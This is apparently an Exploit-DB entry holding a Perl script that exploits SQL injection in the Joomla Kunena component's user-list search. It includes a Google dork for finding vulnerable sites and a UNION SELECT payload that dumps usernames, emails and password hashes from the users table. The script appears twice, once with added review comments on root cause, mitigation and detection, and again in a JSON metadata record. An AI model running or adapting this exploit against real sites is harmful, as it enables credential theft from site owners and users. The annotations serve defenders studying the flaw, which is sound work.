ID EDB-ID:22153
Type exploitdb
Reporter D35m0nd142
Modified 2012-10-22T00:00:00
Description
SQL injection in the Joomla Kunena component (com_kunena) through the search parameter of index.php. Web application exploit for the PHP platform.
#!/usr/bin/perl
#Exploit title: Joomla Component com_kunena SQL Injection exploit
#Google Dork: inurl:index.php?option=com_kunena&
#Exploit Author: D35m0nd142
#Screenshot : http://imageshack.us/f/155/comkunena2.png/
#Vendor HomePage: http://www.joomla.org/
#Special thanks to Taurusomar
# Proof-of-concept for a SQL injection in the com_kunena user list search.
# It sends one GET request and looks for a 32-hex-digit string in the reply.
# NOTE(review): there is no `use strict` / `use warnings`; $code, $agent, $host,
# $ok and $ok1 below are undeclared package globals.

# Clear the terminal through the shell, then print the banner.
system("clear");
print "*********************************************\n";
print "* Joomla Component com_kunena SQL Injection *\n";
print "* Coded by D35m0nd142 *\n";
print "*********************************************\n";
sleep 1;
use LWP::UserAgent;
# The base URL is read from STDIN and used as typed; nothing validates it.
print "Enter the target --> ";
chomp(my $target=<STDIN>);
# URL-encoded value for the `search` parameter. It carries a quote and closing
# parenthesis, an always-false `1=2` predicate and a UNION SELECT that places
# username, email, password and activation from `jos_users` into the result.
# Root cause, presumably: the component builds its user-list query by
# concatenating `search` into the SQL text -- confirm against the vendor fix.
# Mitigation: run a fixed Kunena release (version not stated on this page) and
# bind or escape the search term instead of interpolating it.
# Detection: requests with `option=com_kunena&func=userlist` whose `search`
# value contains `union%20select` or a users-table name. Do not key only on
# `jos_`; that prefix is a constant of this script, not of the flaw.
$code="%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;";
$agent = LWP::UserAgent->new() or die "[!] Error while processing";
# Fixed User-Agent string. The `Firefox/7.0.12011` token looks malformed, so it
# can serve as a weak log indicator for this exact script -- trivially changed.
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
# Everything travels in the query string of a GET, so the whole payload is
# visible in ordinary web-server access logs.
$host= $target. "/index.php?option=com_kunena&func=userlist&search=".$code;
$ok = $agent->request(HTTP::Request->new(GET=>$host));
# The body is read without checking the HTTP status. The pattern accepts the
# first run of 32 hex digits anywhere in the page, so an unrelated token of
# that length is also reported as a password hash.
$ok1 = $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
# NOTE(review): the pattern has a single capture group, so $2 is never set here.
# If logs show this request was answered with user data, treat the exposed
# password hashes as compromised and force resets.
print "[+] Password found --> $1\n$2\n";
sleep 1;
}
else
{
print "Password not found \n";
}
{"id": "EDB-ID:22153", "hash": "4ef44449823c16bf81ab3324100a3783", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla Kunena Component index.php search parameter SQL Injection", "description": "Joomla Kunena Component (index.php search parameter) SQL Injection. Webapps exploit for php platform", "published": "2012-10-22T00:00:00", "modified": "2012-10-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/22153/", "reporter": "D35m0nd142", "references": [], "cvelist": [], "lastseen": "2016-02-02T18:05:52", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-02-02T18:05:52"}, "dependencies": {"references": [], "modified": "2016-02-02T18:05:52"}, "vulnersScore": 0.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/22153/", "sourceData": "#!/usr/bin/perl \r\n#Exploit title: Joomla Component com_kunena SQL Injection exploit \r\n#Google Dork: inurl:index.php?option=com_kunena&\r\n#Exploit Author: D35m0nd142\r\n#Screenshot : http://imageshack.us/f/155/comkunena2.png/\r\n#Vendor HomePage: http://www.joomla.org/ \r\n#Special thanks to Taurusomar\r\nsystem(\"clear\");\r\nprint \"*********************************************\\n\";\r\nprint \"* Joomla Component com_kunena SQL Injection *\\n\";\r\nprint \"* Coded by D35m0nd142 *\\n\";\r\nprint \"*********************************************\\n\";\r\nsleep 1;\r\nuse LWP::UserAgent;\r\nprint \"Enter the target --> \";\r\nchomp(my $target=<STDIN>);\r\n$code=\"%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;\";\r\n$agent = LWP::UserAgent->new() or die \"[!] 
Error while processing\";\r\n$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');\r\n$host= $target. \"/index.php?option=com_kunena&func=userlist&search=\".$code;\r\n$ok = $agent->request(HTTP::Request->new(GET=>$host));\r\n$ok1 = $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){\r\nprint \"[+] Password found --> $1\\n$2\\n\";\r\nsleep 1;\r\n}\r\nelse\r\n{\r\nprint \"Password not found \\n\";\r\n}\r\n", "osvdbidlist": ["86718"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{}